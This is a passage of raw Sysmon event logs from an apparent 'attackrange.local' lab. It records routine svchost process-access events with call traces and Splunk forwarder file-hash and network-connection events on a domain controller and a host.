07:43:42.468{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045805Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.436{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045804Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.436{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045803Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.436{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045802Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.436{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045801Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.436{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045800Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.436{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045799Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.436{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045798Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.436{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045797Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.436{466BC892-02AF-60E8-1400-00000000CF01}10289576C:\Windows\System32\svchost.exe{466BC892-5881-60E8-7F10-00000000CF01}7164C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\radardt.dll+11319|C:\Windows\system32\radardt.dll+f2da|C:\Windows\system32\radardt.dll+727d|c:\windows\system32\wdi.dll+1eea|c:\windows\system32\wdi.dll+1d2c|c:\windows\system32\wdi.dll+14e6|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045796Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.436{466BC892-02AF-60E8-1400-00000000CF01}10289576C:\Windows\System32\svchost.exe{466BC892-5881-60E8-7F10-00000000CF01}7164C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\radardt.dll+d1d3|C:\Windows\system32\radardt.dll+f27e|C:\Windows\system32\radardt.dll+727d|c:\windows\system32\wdi.dll+1eea|c:\windows\system32\wdi.dll+1d2c|c:\windows\system32\wdi.dll+14e6|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045795Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.436{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02AF-60E8-1400-00000000CF01}1028C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045794Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.436{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02AF-60E8-1400-00000000CF01}1028C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045793Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.436{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02AF-60E8-1400-00000000CF01}1028C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045792Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.436{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02AF-60E8-1400-00000000CF01}1028C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001045791Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:42.287{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15E352059B1DEDC7CFA9EFB28A4027F8,SHA256=87231949063C18020C8DE6A982BD6456619D511A5F8AA848BA596E4DCD962655,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806016Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:40.364{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57149-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806018Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:43.950{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A0776EF4179DCC9612F11AC2E03C7FA,SHA256=EC31383B7EC3C307BF54020451CA3232148551CAC3F81D4CF56293B1B3D05A36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045825Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:43.483{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=BC6707CF5232AA9CC977B3DF3E4A3608,SHA256=8D9C82E7B412083E55F15E61DE483A22F5233243513351E39E60075B1C8577D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045824Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:43.467{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=00F0766E215A29EC8D1E4E7029A4F1BB,SHA256=CA11BBC5E07BC51FDEF1B0DC4739FE072FBF8F652C167597016D525B7DC12DB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045823Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:43.467{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4B3D0DCE74CADA78064CDC1545F63271,SHA256=F4861E7AF20F0BECF8879F469248BA40493610F908D519BB9173E88BE04EE687,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045822Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:43.467{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=BC6707CF5232AA9CC977B3DF3E4A3608,SHA256=8D9C82E7B412083E55F15E61DE483A22F5233243513351E39E60075B1C8577D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045821Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:43.467{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=C1BC07E5FD8A18F8F289EDA395661EA4,SHA256=AA70BC0CB8036F67BD83D1671016762B24DCF1085A7E5030F5EA82BF867967D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045820Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:43.467{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03D2C80ACF2B21B28F0C614BDFD7BA1D,SHA256=F80B054496C3C9D5EBDF14EF6C99BF1C2DC489782EAB78A6B837E501430DD3C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806019Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:44.966{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF725499AC76854CEAEF7F7406FE4110,SHA256=A72674700E0480890E60281DF4449EF14CC995E9EE6913FEA13F67A6D17BA467,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045827Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:44.470{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B20C684458B4750032DFA7B2D11C1E2,SHA256=232D72640F72E9745C1022B9DAD20C09BB9870624969812175920EA07962E1CD,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045826Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:35.678{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50895-false10.0.1.12-8000- 23542300x8000000000000000806020Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:45.981{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14FE243EA1B1870F444BFD45FCB9405A,SHA256=FEA0682417116741C5DD65D2A0D082FA5CE7FD7389CDCEA04BA49361B39B4323,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045828Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:45.487{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=619A85D532919130759276F45C8E4C25,SHA256=CDCC222059C22935E00B5FD84FCAABDF429867ABB5AD3118DBF584F3F292943C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806021Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:46.981{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DBD4F946F1CC115E746D58B552918F9,SHA256=758CC8630851D1326A7AD37C9E79582918BC6D2A79C5E3E3D2C40DAD7AF8C913,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045829Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:46.507{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7C6E48CA68A93686157A9C3B5EDA551,SHA256=CA4D3B1889C31CD214BCEAFC9942D1619DB689EC7D394B99C676DC4095151A26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806022Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:47.997{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18AAE8E051DB5DFA1D1F582CDF102458,SHA256=F4E9C98D2976452D3C7AEAA3BCC9E5A7F6D1EB8E86EAC92A583854E59D404699,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045830Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:47.521{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=730D5DD25BD6F71B6737857C5465E2C9,SHA256=328E53BD5689B250467F12FC822D5170848284D3E11A168D0FC7374322B30C0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045833Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:48.753{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E120EF29D27ACC41B6CE80B4969695FF,SHA256=B86A4C1220CE5A2FCB0B99AF96FDDE371851F0440788D4B0F8CA1BDDAEFDCBCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045832Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:48.753{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=00F0766E215A29EC8D1E4E7029A4F1BB,SHA256=CA11BBC5E07BC51FDEF1B0DC4739FE072FBF8F652C167597016D525B7DC12DB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045831Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:48.522{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB29099507875B52017FEBF13CEDE2C2,SHA256=54796EB19D5BE72E490285C57AA57888B367880402B63069203BAD835820BA7D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806023Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:46.239{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 